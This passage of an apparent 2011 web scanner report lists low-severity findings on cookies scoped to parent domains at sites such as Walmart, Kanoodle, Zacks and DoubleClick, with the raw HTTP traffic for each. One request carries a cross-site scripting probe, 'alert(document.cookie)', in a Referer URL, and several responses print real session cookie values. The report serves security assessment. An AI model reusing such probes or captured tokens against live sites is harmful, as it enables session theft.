Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...

16.16. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com
Last-Modified: Sun, 30 Jan 2011 01:51:21 GMT
ETag: "f0b5f444b53d8d069d3f3c230e6ce5fd"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

16.17. http://www.kanoodle.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/43
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...

16.18. http://www.kanoodle.com/ajax/search_spy_data.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 529

&title=Top+Searches+-+Recent,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#0
...[SNIP]...

16.19. http://www.kanoodle.com/ajax/search_spy_data_today.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data_today.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data_today.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

16.20. http://www.kanoodle.com/search_spy.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /search_spy.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search_spy.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...

16.21. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:00:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 30 Jan 2011 01:50:28 GMT
ETag: "cccc2ce42797085e2ccf82df13a9cd5b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

16.22. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:55 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 29 Jan 2011 23:16:07 GMT
ETag: "1126140718825d2e8a4072da2e624330"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

16.23. http://www.popsci.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.popsci.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...

16.24. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Sun, 30 Jan 2011 02:03:54 GMT
Expires: Sun, 30 Jan 2011 02:03:54 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 12096
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907962045525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew29 (ew29_7330869248_34521600)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ
...[SNIP]...

16.25. http://www.zacks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zacks.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...

16.26. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3973.MSN/B4412732.227

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608? HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:33 GMT
Location: http://s0.2mdn.net/viewad/1150992/54-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


16.27. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Set-Cookie: id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:11:59 GMT
Expires: Sun, 30 Jan 2011 17:11:59 GMT
Discarded: true
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/0/0/%2a/s;
...[SNIP]...

16.28. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3a9f/7/0/*/q;234336715;1-0;0;57860936;4307-300/250;40005125/40022912/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch
Set-Cookie: id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT
Date: Sun, 30 Jan 2011 02:04:52 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


16.29. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;235581983;52388360;s HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?mode=flash&sneakpeek=y&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYADSNEAKPEEK:VARIOUS:N
Set-Cookie: id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT
Date: Sat, 29 Jan 2011 23:45:11 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


16.30. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/
Set-Cookie: fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com
Set-Cookie: i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


16.31. http://add.my.yahoo.com/rss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /rss

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:21:50 GMT
Set-Cookie: B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

16.32. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=A06546 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
